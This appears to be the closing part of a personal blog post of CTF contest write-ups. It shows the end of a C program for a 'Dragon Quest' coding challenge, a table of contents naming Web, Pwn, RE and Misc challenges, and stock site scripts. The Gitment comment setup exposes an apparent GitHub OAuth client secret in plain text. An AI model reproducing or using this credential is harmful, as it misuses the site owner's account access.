on the way to leveling..."</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">"The brave still has %dHP left to face the BOSS"</span>,hp);</span><br><span class="line">		<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

      
    </div>
    
    
    
    <div>
    
      <div>

    <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>

</div>
    
    </div>
    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Contest/" rel="tag"><i class="fa fa-tag"></i> Contest</a>
          
        </div>
      
      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/10/14/HDU-Problem-exercise/" rel="next" title="HDU_Problem_exercise">
                <i class="fa fa-chevron-left"></i> HDU_Problem_exercise
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/10/16/learn-pwn/" rel="prev" title="learn_pwn">
                learn_pwn <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      
        <div id="gitment-container"></div>
      
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">IFpop</p>
              <p class="site-description motion-element" itemprop="description">IFpop的个人站</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">12</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">18</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友链
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://m4x.fun" title="M4x" target="_blank">M4x</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://code.felinae98.cn" title="唐老板" target="_blank">唐老板</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/ZHijack" title="谱尼" target="_blank">谱尼</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://l1b0.fun" title="L1B0" target="_blank">L1B0</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://izayoi.cn/" title="IZAYOI" target="_blank">IZAYOI</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://m0yuqi.cn" title="雨琦姐姐" target="_blank">雨琦姐姐</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Web"><span class="nav-number">1.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#打比赛前先撸一只猫！"><span class="nav-number">1.1.</span> <span class="nav-text">打比赛前先撸一只猫！</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#你看见过我的菜刀么"><span class="nav-number">1.2.</span> <span class="nav-text">你看见过我的菜刀么</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#BurpSuiiiiiit"><span class="nav-number">1.3.</span> <span class="nav-text">BurpSuiiiiiit!!!</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Easysql"><span class="nav-number">1.4.</span> <span class="nav-text">Easysql</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#性感潇文清，在线算卦"><span class="nav-number">1.5.</span> <span class="nav-text">性感潇文清，在线算卦</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Misc"><span class="nav-number">2.</span> <span class="nav-text">Misc</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#签到"><span class="nav-number">2.1.</span> <span class="nav-text">签到</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#啊啊啊啊啊啊啊！！！我好兴奋！！！"><span class="nav-number">2.2.</span> <span class="nav-text">啊啊啊啊啊啊啊！！！我好兴奋！！！</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#散打黑客的压缩包"><span class="nav-number">2.3.</span> <span class="nav-text">散打黑客的压缩包</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#是谁杀了谁"><span class="nav-number">2.4.</span> <span class="nav-text">是谁杀了谁</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Pwn"><span class="nav-number">3.</span> <span class="nav-text">Pwn</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Find-tools"><span class="nav-number">3.1.</span> <span class="nav-text">Find tools</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Baby-rop"><span class="nav-number">3.2.</span> <span class="nav-text">Baby rop</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Baby-Shellcode"><span class="nav-number">3.3.</span> <span class="nav-text">Baby Shellcode</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#RE"><span class="nav-number">4.</span> <span class="nav-text">RE</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#jiang’s-fan-密码都记错？你个假粉丝！！"><span class="nav-number">4.1.</span> <span class="nav-text">jiang’s fan 密码都记错？你个假粉丝！！</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#secret"><span class="nav-number">4.2.</span> <span class="nav-text">secret</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Easy-VB"><span class="nav-number">4.3.</span> <span class="nav-text">Easy VB</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#冰菓"><span class="nav-number">4.4.</span> <span class="nav-text">冰菓</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PYC是啥子嘛"><span class="nav-number">4.5.</span> <span class="nav-text">PYC是啥子嘛?</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Andriod"><span class="nav-number">5.</span> <span class="nav-text">Andriod</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Sign-in"><span class="nav-number">5.1.</span> <span class="nav-text">Sign_in</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Coding"><span class="nav-number">6.</span> <span class="nav-text">Coding</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Dragon-Quest"><span class="nav-number">6.1.</span> <span class="nav-text">Dragon Quest</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-snowflake-o"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">IFpop</span>

  
</div>









        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访问人数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i> 总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  







<!-- LOCAL: You can save these files to your site and update links -->
    
        
        <!-- 请使用下面的替换  2019-06-30更新-->
        <link rel="stylesheet" href="https://billts.site/extra_css/gitment.css">
        <script src="https://billts.site/js/gitment.js"></script>
    
<!-- END LOCAL -->

    
      <style>
        a.gitment-editor-footer-tip { display: none; }
        .gitment-container.gitment-footer-container { display: none; }
      </style>
    

    
      <script type="text/javascript">
      function renderGitment(){
        var gitment = new Gitment({
            id: '1571140199000', 
            owner: 'IFpop',
            repo: 'blog-comments',
            
            oauth: {
            
            
                client_secret: 'd50c66f5d4506f10ba8384d04bbd7be2d9c8fc81',
            
                client_id: 'b9f6019a4a776023a56d'
            }});
        gitment.render('gitment-container');
      }

      
      renderGitment();
      
      </script>
    







  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>